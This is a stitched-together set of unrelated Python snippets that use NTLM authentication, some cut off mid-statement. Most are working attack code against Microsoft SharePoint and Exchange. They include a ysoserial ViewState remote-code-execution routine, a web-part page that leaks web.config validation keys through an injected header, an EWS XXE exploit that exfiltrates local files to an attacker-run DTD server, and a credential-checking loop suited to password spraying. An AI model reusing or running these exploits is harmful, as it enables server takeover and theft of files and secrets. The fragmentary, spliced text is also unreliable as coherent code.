def check_creds(opts): url, domain, username, password, authtype, proxies = opts if authtype == "ntlm": if domain: auth = HttpNtlmAuth(f"{domain}\\{username}", password) else: auth = HttpNtlmAuth(username, password) else: if domain: auth = (f"{domain}\\{username}", password) else: auth = (username, password) try: res = requests.get(url, verify=False, proxies=proxies, auth=auth, allow_redirects=False) if res.status_code != 401: print(f"Success! {username}:{password}") return username, password except Exception as e: print(f"Error occurred with {username}:{password}: {e}")
def trigger_rce(target, domain, path, user, password, cmd, key): out = subprocess.Popen([ 'yss/ysoserial.exe', '-p', 'ViewState', '-g', 'TypeConfuseDelegate', '-c', '%s' % cmd, '--apppath=%s' % path, '--path=%s_layouts/15/zoombldr.aspx' % path, '--islegacy', '--validationalg=HMACSHA256', '--validationkey=%s' % key ], stdout=subprocess.PIPE) rce = { "__VIEWSTATE" : out.communicate()[0].decode() } requests.post("http://%s/_layouts/15/zoombldr.aspx" % target, data=rce, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password))
def init_requests(self, domain, username, password): self.logger = Logger().get_logger() # create the sessions object for the requests self.session = requests.Session() self.session.verify = False # update the ua flag self.session.headers.update({'User-Agent': constants.USER_AGENT}) # check if we have to add the auth to our requests if username and password: if domain: username = '******' % (domain, username) self.session.auth = HttpNtlmAuth(username, password)
def put_page(target, domain, user, password): payload = """<WebPartPages:DataFormWebPart runat="server"> <ParameterBindings> <ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" /> </ParameterBindings> <xsl> <xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0"> <xsl:param name="ssi" /> <xsl:template match="/"> <xsl:value-of select="$ssi" disable-output-escaping="yes" /> </xsl:template> </xsl:stylesheet> </xsl> </WebPartPages:DataFormWebPart>""" r = requests.put("http://%s/poc.aspx" % target, data=payload, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password)) assert (r.status_code == 200 or r.status_code == 201), "(-) page creation failed, user doesn't have site ownership rights!"
def main(): """ The main function """ args = create_arguments() auth = get_auth_info(args) session = requests.Session() session.auth = HttpNtlmAuth(auth["user"], auth["password"]) response = session.get(args.url) cookie = {".ASPXauth": response.text} response = session.get(args.url, cookies=cookie) root = ElementTree.fromstring(response.text) os.makedirs(RDP_FILES_PATH, exist_ok=True) for item in root.findall("./{*}Publisher/{*}Resources/{*}Resource"): parsed_resource = parse_resource(item) for terminal_server in parsed_resource["terminal_servers"]: rdp_file = download_rdp(cookie, terminal_server) generate_desktop(parsed_resource, rdp_file)
def __init__(self, args): o = urlparse(args.url) self.url = args.url self.service = o.path self.username = args.username self.password = args.password self.target = args.target self.headers = args.header self.method = args.request self.data = args.data self.content_type = args.content_type self.s = requests.Session() self.s.auth = HttpNtlmAuth(self.username, self.password) self.s.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' } self.s.proxies = {'http': 'http://127.0.0.1:8080'}
def __init__(self, site_root_url: str, username: str, password: str): super().__init__() ## TODO: Add a regex check setter function self.site_url = site_root_url self.auth = HttpNtlmAuth(username=username, password=password)
def main(t, usr, pwd): server = HTTPServer(('0.0.0.0', int(port)), xxe) handlerthr = Thread(target=server.serve_forever, args=()) handlerthr.daemon = True handlerthr.start() username = usr.split("@")[0] domain = usr.split("@")[1] h = {"Content-type" : "text/xml; charset=utf-8"} xxe_payload = """<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY %% start "<![CDATA["> <!ENTITY %% stuff SYSTEM "file:///%s"> <!ENTITY %% end "]]>"> <!ENTITY %% dtd SYSTEM "http://%s:%d/poc.dtd"> %%dtd; ]>""" % (file, host, int(port)) d = """<?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages" xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"> <soap:Header> <t:RequestServerVersion Version="Exchange2010_SP2"></t:RequestServerVersion> </soap:Header> <soap:Body> <m:RouteComplaint MessageDisposition="SaveOnly"> <m:Data>%s</m:Data> </m:RouteComplaint> </soap:Body> </soap:Envelope>""" % b64encode(xxe_payload.encode()).decode("utf-8") requests.post("https://%s/ews/Exchange.asmx" % t, data=d, headers=h, verify=False, auth=HttpNtlmAuth('%s\\%s' % (domain,username), pwd))
</t:NumberedRecurrence> </t:Recurrence> </t:CalendarItem> </m:Items> </m:CreateItem> </soap:Body> </soap:Envelope> """ % payload2 res = requests.post("https://%s/ews/Exchange.asmx" % target, data=payload1, headers={ "Content-type": "text/xml; charset=utf-8", }, verify=False, auth=HttpNtlmAuth('%s' % (username), pwd)) if res.status_code != 200: print("error 1") exit() ct = res.content item_id = ct.split('<t:ItemId Id="')[1].split('"')[0] change_key = ct.split('ChangeKey="')[1].split('"')[0] print "Attacking target %s with user %s" % (target, username) print "Sending command cmd.exe /c %s" % cmd session = requests.Session() header = {"Cookie": "mkt=en-US"} data = { "destination": "https://%s/owa" % target,
def get_vkey(target, domain, user, password): h = { "360Vulcan": "<form runat=\"server\" /><!--#include virtual=\"/web.config\"-->" } r = requests.get("http://%s/poc.aspx" % target, auth=HttpNtlmAuth('%s\\%s' % (domain, user), password), headers=h) match = re.search("machineKey validationKey=\"(.{64})", r.text) assert match, "(-) unable to leak the validation key, exploit failed!" return match.group(1)